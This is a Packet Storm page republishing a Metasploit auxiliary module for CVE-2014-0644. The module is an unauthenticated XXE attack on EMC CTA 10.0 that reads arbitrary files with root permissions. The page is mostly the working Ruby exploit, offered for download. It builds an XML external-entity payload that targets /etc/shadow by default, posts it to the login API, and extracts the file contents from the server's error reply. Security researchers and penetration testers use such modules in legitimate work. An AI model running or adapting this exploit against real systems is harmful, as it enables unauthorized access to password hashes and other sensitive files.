what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

EMC CTA 10.0 Unauthenticated XXE Arbitrary File Read

EMC CTA 10.0 Unauthenticated XXE Arbitrary File Read
Posted Aug 31, 2024
Authored by Brandon Perry | Site metasploit.com

EMC CTA v10.0 is susceptible to an unauthenticated XXE attack that allows an attacker to read arbitrary files from the file system with the permissions of the root user.

tags | exploit, arbitrary, root
advisories | CVE-2014-0644
SHA-256 | c2dd082e06aac52186e44ae70fb12b7ad1fbfb73fa6e41171df28951ddedcfc6

EMC CTA 10.0 Unauthenticated XXE Arbitrary File Read

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
'Description' => %q{
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
that allows an attacker to read arbitrary files from the file system
with the permissions of the root user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
],
'References' =>
[
['CVE', '2014-0644'],
['EDB', '32623']
],
'DisclosureDate' => '2014-03-31'
))

register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [ true, "Base directory path", '/']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
]
)
end

def run

doctype = Rex::Text.rand_text_alpha(6)
element = Rex::Text.rand_text_alpha(6)
entity = Rex::Text.rand_text_alpha(6)

pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE #{doctype} [
<!ELEMENT #{element} ANY >
<!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>
<Request>
<Username>root</Username>
<Password>&#{entity};</Password>
</Request>
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'api', 'login'),
'method' => 'POST',
'data' => pay
})

if !res or !res.body
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
end

file = /For input string: "(.*)"/m.match(res.body)

if !file or file.length < 2
fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")
end

file = file[1]

path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])

print_good("File saved to: " + path)
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close